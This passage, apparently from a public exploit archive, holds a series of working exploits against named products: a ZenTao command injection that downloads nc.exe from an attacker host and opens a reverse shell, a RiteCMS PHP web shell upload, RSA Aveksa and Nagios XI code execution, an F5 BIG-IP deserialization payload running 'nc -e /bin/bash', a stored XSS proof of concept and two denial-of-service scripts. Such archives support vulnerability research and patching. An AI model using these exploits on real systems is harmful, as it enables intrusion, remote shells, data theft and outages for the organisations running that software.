    third_request = request.post(url+"/index.php?function=SNMP_config", files={
        'CSRF_22': (None, third_token),
        'onglet': (None, 'SNMP_MIB'),
        'old_onglet': (None, 'SNMP_RULE'),
        'snmp_config_length': (None, '10')
    })
    print("[+] 3rd token : %s" % third_token)
    third_request_text = third_request.text
    soup = BeautifulSoup(third_request_text, "lxml")
    forth_token = soup.find_all("input", id="CSRF_26")[0].get("value")
    print("[+] 4th token : %s" % forth_token)
    print("[+] Triggering payload ..")
    print("[+] Check your nc ;)")
    forth_request = request.post(url+"/index.php?function=SNMP_config", files={
        'CSRF_26': (None, forth_token),
        'onglet': (None, 'SNMP_MIB'),
        'old_onglet': (None, 'SNMP_MIB'),
        'update_snmp': (None, 'send')
    })


if login():
    print("[+] Valid credentials!")
    inject_payload()
-
ZenTao Pro 8.8.2 - Command Injection
# Exploit Title: ZenTao Pro 8.8.2 - Command Injection
# Date: 2020-07-01
# Exploit Author: Daniel Monzón & Melvin Boers
# Vendor Homepage: https://www.zentao.pm/
# Version: 8.8.2
# Tested on: Windows 10 / WampServer
# Other versions like pro or enterprise edition could be affected as well
# Netcat is needed to use this exploit

import requests
import hashlib
import urllib.parse

host = 'http://192.168.223.132'
username = 'admin'
password = 'Test123!@#'
name = 'Test2'
command = 'certutil.exe+-urlcache+-f+-split+http%3A%2F%2F192.168.223.131%2Fnc.exe+C%3A%5Cbad.exe+%26%26'
command2 = 'C:\\bad.exe 192.168.223.131 9001 -e cmd.exe &&'
git_path = 'C%3A%5CProgramData'

x = requests.session()  # Create a session, as needed because we need admin rights.


def sign_in(url, username, password):
    password = hashlib.md5(password.encode('utf-8')).hexdigest()  # We need to md5 encode the password in order to sign in
    proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}  # Just for debugging phase
    credentials = {'account': username, 'password': password}  # The credentials we need
    path = url + '/zentao/user-login.html'  # URL + path
    x.post(path, data=credentials, proxies=proxy, verify=False)  # Send the post request to sign in
    return '[*] We are signed in!'


def go_to_repo(url):
    path = url + '/zentao/repo-browse.html'
    x.get(path, verify=False)
    print('[*] Getting to repo path')


def create_repo(url, name, command):
    headers = {'Accept': 'application/json, text/javascript, */*; q=0.01',
               'Accept-Encoding': 'gzip, deflate',
               'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
               'X-Requested-With': 'XMLHttpRequest',
               'Origin': 'http://192.168.223.132',
               'Referer': 'http://192.168.223.132/pro/repo-create.html',
               'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',
               'Accept-Language': 'en-US,en;q=0.5'}
    cookies = {'ajax_lastNext': 'on', 'windowWidth': '1846', 'windowHeight': '790'}
    path = url + '/zentao/repo-create.html'
    # The "client" field of the repository form is passed to a shell; this is the injection point
    parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command
    x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False)
    print('[*] Creating the repo')


def get_shell(url, name, command):
    headers = {'Accept': 'application/json, text/javascript, */*; q=0.01',
               'Accept-Encoding': 'gzip, deflate',
               'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
               'X-Requested-With': 'XMLHttpRequest',
               'Origin': 'http://192.168.223.132',
               'Referer': 'http://192.168.223.132/pro/repo-create.html',
               'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',
               'Accept-Language': 'en-US,en;q=0.5'}
    cookies = {'ajax_lastNext': 'on', 'windowWidth': '1846', 'windowHeight': '790'}
    path = url + '/zentao/repo-create.html'
    parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command2
    x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False)
    print('[*] Check your netcat listener!')


def main():
    switch = True
    if switch:
        sign_in(host, username, password)
    if switch:
        go_to_repo(host)
    if switch:
        create_repo(host, name, command)
    if switch:
        get_shell(host, name, command2)
    switch = False


if __name__ == "__main__":
    main()
-
File Management System 1.1 - Persistent Cross-Site Scripting
# Exploit Title: File Management System 1.1 - Persistent Cross-Site Scripting
# Date: 2020-06-30
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://www.sourcecodester.com/download-code?nid=13333&title=File+Management+System+Very+Complete+Using+PHP%2FMySQLi+version+1.1
# Software Link: https://www.sourcecodester.com/download-code?nid=13333&title=File+Management+System+Very+Complete+Using+PHP%2FMySQLi+version+1.1
# Version: 0.1.0
# Tested on: Kali Linux

Source code (view_admin.php):

<?php
require_once("include/connection.php");
$query="SELECT * FROM admin_login";
$result=mysqli_query($conn,$query);
while($rs=mysqli_fetch_array($result)){
    $id = $rs['id'];
    $fname=$rs['name'];
    $admin=$rs['admin_user'];
    $pass=$rs['admin_password'];
    $status=$rs['admin_status'];
?>
<tr>
    <td width='10%'><?php echo $fname; ?></td>
    <td align='center'><?php echo $admin; ?></td>
    <td align='center' width="20%"><?php echo $pass; ?></td>
    <td align='center'><?php echo $status; ?></td>
    <td align='center'><a href="#modalRegisterFormsss?id=<?php echo $id;?>"> <i class="fas fa-user-edit" data-toggle="modal" data-target="#modalRegisterFormsss"></i> </a> | <a href="delete_admin.php?id=<?php echo htmlentities($rs['id']); ?>"><i class='far fa-trash-alt'></i></a></td>
</tr>
<?php } ?>

The name, user and status fields are echoed into the page without output encoding (only the delete link's id goes through htmlentities), so a stored value containing markup is rendered as HTML.

POC:
1. http://192.168.1.58/Private_Dashboard/view_admin.php
2. Click the "Add admin" button
3. Write the payload in the name field (<script>alert(1);</script>)
4. Click the "View admin" button
5. The stored payload is rendered and executes
-
Fire Web Server 0.1 - Remote Denial of Service (PoC)
# Exploit Title: Fire Web Server 0.1 - Remote Denial of Service (PoC)
# Date: 2020-06-26
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/firewebserver/
# Software Link: https://sourceforge.net/projects/firewebserver/files/
# Version: Pre-Alpha
# Tested on: Windows 7 , Windows Vista

#!/usr/bin/python
import socket, sys

if len(sys.argv) < 3:
    print("Usage: python fwspa_dos.py targetIP targetPort")
else:
    print("[*] Sending evil http request to target")
    expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    expl.connect((sys.argv[1], int(sys.argv[2])))
    # 1015 bytes of 'A' is the oversized request the server fails to handle
    expl.send(b"A" * 1015)
    expl.close()
-
RiteCMS 2.2.1 - Authenticated Remote Code Execution
# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
# Date: 2020-07-03
# Exploit Author: Enes Özeser
# Vendor Homepage: http://ritecms.com/
# Version: 2.2.1
# Tested on: Linux
# CVE: CVE-2020-23934

1- Go to the following URL.
   >> http://(HOST)/cms/
2- The default username and password is admin:admin. We must know the login credentials.
3- Go to "Filemanager" and press the "Upload file" button.
4- Choose your PHP web shell script and upload it.
   PHP Web Shell Code == <?php system($_GET['cmd']); ?>
5- You can find the uploaded file there.
   >> http://(HOST)/media/(FILE-NAME).php
6- We can execute a command now.
   >> http://(HOST)/media/(FILE-NAME).php?cmd=id

(( REQUEST ))

GET /media/(FILE-NAME).php?cmd=id HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://(HOST)/cms/index.php?mode=filemanager&directory=media
Connection: close
Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u
Upgrade-Insecure-Requests: 1

(( RESPONSE ))

HTTP/1.1 200 OK
Date: Fri, 06 Jul 2020 20:02:13 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 14
Connection: close
Content-Type: text/html; charset=UTF-8

uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
Grafana 7.0.1 - Denial of Service (PoC)
# Exploit Title: Grafana 7.0.1 - Denial of Service (PoC)
# Date: 2020-05-23
# Exploit Author: mostwanted002
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 3.0.1 - 7.0.1
# Tested on: Linux
# CVE : CVE-2020-13379

#!/bin/bash
if [[ $1 != "" ]]; then
    curl -I "${1}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D"
else
    echo "Usage: grafana-dos.sh <TARGET>. Example: grafana-dos.sh http://localhost:3000"
fi
-
RSA IG&L Aveksa 7.1.1 - Remote Code Execution
# Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution
# Date: 2019-04-16
# Exploit Author: Jakub Palaczynski, Lukasz Plonka
# Vendor Homepage: https://www.rsa.com/
# Version: 7.1.1, prior to P02
# CVE : CVE-2019-3759
# (all vulnerable versions can be found at https://www.dell.com/support/security/pl-pl/details/DOC-106943/DSA-2019-134-RSA-Identity-Governance-and-Lifecycle-Product-Security-Update-for-Multiple-Vulnerabi)

Information:
Authenticated users can bypass authorization and get full access to the Workpoint Architect module. This module makes it possible to run Groovy scripts, which results in code execution.

1. First the user needs to learn the username and password for Architect (different from the Aveksa login).
Sample request:
https://AVEKSA_HOST/aveksa/main?Oid=193783&ReqType=GetPartial&PageID=ChangeRequestJobPageData&WFObjectID=1%3AWPDS&crID=193783&isAjax=false
Search for "<IFRAME" in the HTML source and note the username and password.

2. Log into Architect.
Sample request:

POST /aveksaWFArchitect/auth/login/ HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 146
Cookie: JSESSIONID=session
Connection: close

{"user":"USERNAME","password":"PASSWORD","dsn":"WPDS","product":{"name":"wp-architect","version":"4.40.16"}}

3. Create a new script that bypasses the Java Security Policy and runs the "id" system command.
* "statementText" - contains base64-encoded Groovy code
* "name" (at the end) - script name that must be unique
* Save "scriptId" from the response, as it is needed for the next request.

POST /aveksaWFArchitect/scripts/?refresh=true&replace=false&checkSyntax=false&saveWithRollbackVersion=false HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 733
Cookie: JSESSIONID=session
Connection: close

{"statements":[{"scriptLineId":"-26:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"sequence":1,"scriptClassId":17,"sourceName":"LOCAL","scriptId":"","name":"","validationStatus":0,"validationStatusMsg":"","statement":{"statementText":"U3lzdGVtLnNldFNlY3VyaXR5TWFuYWdlcihudWxsKTsKJ2lkJy5leGVjdXRlKCkudGV4dA==","statementJava":{"javaClass":"","ejb":false,"ejbVersion":"","jndiName":"","method":"","methodIsStatic":false,"returns":{"location":"system","name":""},"useInstance":false,"useInstanceObjectName":"","action":"insert"}}}],"scriptId":"-27:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"name":"SCRIPTNAME","scriptTypeId":3,"validationStatus":0,"falseMsg":"","description":"","emitEvents":false,"errorText":"","saveMethod":"Architect"}

4. Run the created script:
* The response contains the result of your command

PUT /aveksaWFArchitect/scripts/execute/ HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 58
Cookie: JSESSIONID=session
Connection: close

{"id":"SCRIPTID_OF_CREATED_SCRIPT","newTransaction":false,"symbolTable":{}}
-
Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution
# Exploit Title: Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution
# Date: 2020-04-11
# Exploit Author: Basim Alabdullah
# Vendor homepage: https://www.nagios.com
# Version: 5.6.12
# Software link: https://www.nagios.com/downloads/nagios-xi/
# Tested on: CentOS REDHAT 7.7.1908 (core)
#
# Authenticated Remote Code Execution
#

import requests
import sys
import re

uname = sys.argv[2]
upass = sys.argv[3]
ipvictim = sys.argv[1]

with requests.session() as s:
    urlz = ipvictim + "/login.php"
    headers = {
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'en-US,en;q=0.8',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Referer': ipvictim + '/index.php',
        'Connection': 'keep-alive'
    }
    # Fetch the login page to obtain the nsp anti-CSRF token
    response = s.get(urlz, headers=headers)
    txt = response.text
    x = re.findall('var nsp_str = "(.*?)"', txt)
    for xx in x:
        login = {
            'username': uname,
            'password': upass,
            'nsp': xx,
            'page': 'auth',
            'debug': '',
            'pageopt': 'login',
            'redirect': ipvictim + '/index.php',
            'loginButton': ''
        }
        rev = s.post(ipvictim + "/login.php", data=login, headers=headers)
        # Load an authenticated page to obtain a fresh nsp token for the next request
        cmd = s.get(ipvictim + "/includes/components/ccm/?cmd=modify&type=host&id=1&page=1", allow_redirects=True)
        txt1 = cmd.text
        xp = re.findall('var nsp_str = "(.*?)"', txt1)
        for xxp in xp:
            payload = "a|{cat,/etc/passwd};#"
            exploit = s.get(ipvictim + "/includes/components/xicore/export-rrd.php?host=localhost&service=Root%20Partition&start=011&end=012&step=" + payload + "&type=a&nsp=" + xxp)
            print(exploit.text)
-
BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution
#!/bin/bash
#
# EDB Note Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48642.zip
#
# Exploit Title: F5 BIG-IP Remote Code Execution
# Date: 2020-07-06
# Exploit Authors: Charles Dardaman of Critical Start, TeamARES
#                  Rich Mirch of Critical Start, TeamARES
# CVE: CVE-2020-5902
#
# Requirements:
#   Java JDK
#   hsqldb.jar 1.8
#   ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
#

if [[ $# -ne 3 ]]
then
    echo
    echo "Usage: $(basename $0) <server> <localip> <localport>"
    echo
    exit 1
fi

server=${1?hostname argument required}
localip=${2?Localip argument required}
port=${3?Port argument required}

if [[ ! -f $server.der ]]
then
    echo "$server.der does not exist - extracting cert"
    openssl s_client \
        -showcerts \
        -servername $server \
        -connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der

    keytool -import \
        -alias $server \
        -keystore keystore \
        -storepass changeit \
        -noprompt \
        -file $PWD/$server.der
else
    echo "$server.der already exists. skipping extraction step"
fi

java -jar ysoserial-master-SNAPSHOT.jar \
    CommonsCollections6 \
    "/bin/nc -e /bin/bash $localip $port" > nc.class

xxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex

if [[ ! -f f5RCE.class ]]
then
    echo "Building exploit"
    javac -cp hsqldb.jar f5RCE.java
fi

java -cp hsqldb.jar:. \
    -Djavax.net.ssl.trustStore=keystore \
    -Djavax.net.ssl.trustStorePassword=changeit \
    f5RCE $server payload.hex